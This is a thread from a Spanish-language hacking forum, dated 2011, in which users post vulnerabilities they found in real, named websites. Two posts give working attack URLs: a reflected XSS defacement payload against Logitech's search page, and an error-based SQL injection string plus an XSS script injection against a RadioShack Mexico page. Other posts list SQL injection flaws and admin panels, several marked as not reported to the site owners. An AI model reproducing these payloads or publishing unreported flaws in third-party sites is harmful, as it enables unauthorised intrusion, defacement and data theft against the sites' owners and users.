• Reporte de bugs en webs

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #274800  por MichBukana
 02 Mar 2011, 23:31
Avira:
Asociacion de asegurados de Vida y retiro de la republica argentina

no confundamos por favor.

y digo lo mismo no reporten cosas que no son suyas. tss que patetico, hay va mi aporte :O

Página: [ Debe registrarse para ver este enlace ]
Bug:
Código: [ Debe registrarse para ver este enlace ]
http://www.logitech.com/es-es/search?q=%2F%27%22%3E%3Cbr%3E%3Cbr%3E%3Cstyle%3Ebody{background:black;}%3C/style%3E%3Ccenter%3E%3Ch1%3E%3Cfont%20
color=%22white%22%3EUn%20Enorme%20Saludo%20a%20la%20gente%20del%20Foro%20Indetectables.net%3Cp%3E%20by%20Michbukana!%20:O%3C/font%3E%3C/h1%3E
%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg%20src=%22http://img80.imageshack.us/img80/442/logologitech.th.png%22%20%20width=
%22320%22%20height=%22320%22%20/%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3C/font%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3
Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
Método: XSS

[ Debe registrarse para ver este enlace ]
 #275964  por Skillmax
 12 Mar 2011, 00:57
Web: [ Debe registrarse para ver este enlace ]

BUG: [ Debe registrarse para ver este enlace ]

Método: XSS

Descubridor: Skillmax/Enigmatic



- Ya apenas tengo tiempo para reportar fallos.. cuando saco 5 minutos intento hacer algo, creo que antes este bug existía y lo descubrió warvector pero fue parcheado, y otra vez, aparece..


Suerte, gente.
 #278308  por Spectrus
 19 Mar 2011, 20:01
Web: [ Debe registrarse para ver este enlace ]

Fallo: [ Debe registrarse para ver este enlace ]

Método Utilizado: SQL Injection

Descubridor: SpectruS

Panel: [ Debe registrarse para ver este enlace ]

Otros comentarios: No reportado y es un foro.

__________________________________________________
Web: [ Debe registrarse para ver este enlace ]

Fallo: [ Debe registrarse para ver este enlace ]

Método Utilizado: SQL Injection

Descubridor: SpectruS

Panel: [ Debe registrarse para ver este enlace ]
Otros comentarios: Sin reportar!
 #279178  por Skillmax
 22 Mar 2011, 14:45
hdbreaker escribió:WEB: [ Debe registrarse para ver este enlace ]

Link del error/archivo: [ Debe registrarse para ver este enlace ]'

Metodo Utilizado: SQL injection

Descubridor: HD_Breaker

Panel: [ Debe registrarse para ver este enlace ]

Estado: Reportado sin respuesta

Hola, hdbreaker, siento decirte que este bug ya lo encontré yo, anteriormente, lo posteé en la página 5 de este mismo post, gracias de todas maneras.

[ Debe registrarse para ver este enlace ]


 #279390  por hdbreaker
 23 Mar 2011, 02:13
Enigmatic escribió:
hdbreaker escribió:WEB: [ Debe registrarse para ver este enlace ]

Link del error/archivo: [ Debe registrarse para ver este enlace ]'

Metodo Utilizado: SQL injection

Descubridor: HD_Breaker

Panel: [ Debe registrarse para ver este enlace ]

Estado: Reportado sin respuesta

Hola, hdbreaker, siento decirte que este bug ya lo encontré yo, anteriormente, lo posteé en la página 5 de este mismo post, gracias de todas maneras.

[ Debe registrarse para ver este enlace ]


Disculpa no lo he visto de todas formas le viene bien otra advertencia ya q no ha hecho nada desde tu reporte... un abrazos
 #280250  por propa
 25 Mar 2011, 03:37
WEB: [ Debe registrarse para ver este enlace ]

BUG: [ Debe registrarse para ver este enlace ]'

Metodo Utilizado: SQL injection

Descubridor: Propa

Panel: No encontrado

Estado: Reportado sin respuesta

=========================================

WEB: [ Debe registrarse para ver este enlace ]

BUG: [ Debe registrarse para ver este enlace ]'

Metodo Utilizado: SQL injection

Descubridor: Propa

Panel: No encontrado

Estado: No Reportado
 #285722  por KHC
 15 Abr 2011, 00:42
WEB: [ Debe registrarse para ver este enlace ]

BUG: [ Debe registrarse para ver este enlace ]

SQL Injection:
Código: [ Debe registrarse para ver este enlace ]
http://www.radioshack.com.mx/subcate.ph ... +row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)--+1
XSS Injection:
Código: [ Debe registrarse para ver este enlace ]
http://www.radioshack.com.mx/tiendas.php?CIUDAD='"--><script>alert(0x0000AA)</script>
Descubridor : Juh...

Metodo Utilizado: SQL Injection, XSS Injection, Encoding
  • 1
  • 8
  • 9
  • 10
  • 11
  • 12
  • 14